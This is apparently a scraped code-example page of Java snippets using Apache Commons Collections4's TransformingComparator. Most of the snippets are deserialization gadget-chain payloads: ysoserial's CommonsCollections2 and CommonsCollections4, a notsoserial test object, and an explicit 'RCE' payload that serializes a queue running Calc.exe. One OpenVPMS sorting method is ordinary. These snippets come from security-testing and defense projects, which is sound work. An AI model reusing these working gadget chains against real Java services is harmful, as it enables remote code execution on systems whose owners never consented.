List of usage examples for org.apache.commons.collections4.comparators TransformingComparator TransformingComparator
public TransformingComparator(Transformer<? super I, ? extends O> transformer)
From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections2.java
public Queue<Object> getObject(final String command) throws Exception { final TemplatesImpl templates = Gadgets.createTemplatesImpl(command); // mock method name until armed final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); // create queue with numbers and basic comparator final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(transformer)); // stub data for replacement later queue.add(1);//from w ww .j a v a2s . c o m queue.add(1); // switch method called by comparator Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); // switch contents of queue final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue"); queueArray[0] = templates; queueArray[1] = 1; return queue; }
From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections4.java
public Queue<Object> getObject(final String command) throws Exception { Object templates = Gadgets.createTemplatesImpl(command); ConstantTransformer constant = new ConstantTransformer(String.class); // mock method name until armed Class[] paramTypes = new Class[] { String.class }; Object[] args = new Object[] { "foo" }; InstantiateTransformer instantiate = new InstantiateTransformer(paramTypes, args); // grab defensively copied arrays paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes"); args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs"); ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate }); // create queue with numbers PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain)); queue.add(1);/*from ww w . j a va 2s . com*/ queue.add(1); // swap in values to arm Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class); paramTypes[0] = Templates.class; args[0] = templates; return queue; }
From source file:org.kantega.notsoserial.CreateBytesIT.java
private Object nastySerializable() { InvokerTransformer transformer = new InvokerTransformer("toString", new Class[] {}, new Object[] {}); Queue priorityQueue = new PriorityQueue(2, new TransformingComparator(transformer)); priorityQueue.add(1);/*from w w w .j a v a 2 s . c om*/ priorityQueue.add(1); TemplatesImpl templates = createTemplates(); setFieldValue(transformer, "iMethodName", "newTransformer"); Object[] queue = (Object[]) getFieldValue(priorityQueue, "queue"); queue[0] = templates; queue[1] = templates; return priorityQueue; }
From source file:org.openvpms.component.business.service.archetype.helper.sort.IMObjectSorter.java
/** * Sorts objects on a node name.//from w ww . j av a2 s .c o m * * @param list the list to sort. This list is modified * @param name the name of the node to sort on * @return {@code list} */ public <T extends IMObject> List<T> sort(List<T> list, String name, boolean ascending) { Comparator<T> comparator; if ("id".equals(name)) { comparator = getIdComparator(); } else if ("name".equals(name)) { comparator = getNameComparator(); } else { comparator = new TransformingComparator<T, Object>(new NodeTransformer<T>(name)); } if (!ascending) { comparator = new ReverseComparator<T>(comparator); } Collections.sort(list, comparator); return list; }
From source file:ser05j.RCE.java
/** * Creates a Remote Command Execution Exploit based on Apache Commons Collections4 4.0 * * @throws Exception for <i>everything</i>. * @return a byte array containing the serialized queue *///from ww w .jav a 2 s .c o m private static byte[] RCEpayload() throws Exception { Object templates = Gadgets.createTemplatesImpl("Calc.exe"); // Object templates = Gadgets.createTemplatesImpl("write .gitignore"); ConstantTransformer<Object, Class<String>> constant = new ConstantTransformer<>(String.class); // mock method name until armed Class<?>[] paramTypes = new Class[] { String.class }; Object[] args = new Object[] { "foo" }; InstantiateTransformer<?> instantiate = new InstantiateTransformer<>(paramTypes, args); // grab defensively copied arrays paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes"); args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs"); @SuppressWarnings("unchecked") Transformer<Object, Object> chain = new ChainedTransformer<Object>( new Transformer[] { constant, instantiate }); // create queue with numbers PriorityQueue<Object> queue = new PriorityQueue<>(2, new TransformingComparator<>(chain)); queue.add(1); queue.add(1); // swap in values to arm Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class); paramTypes[0] = Templates.class; args[0] = templates; return serialize(queue); }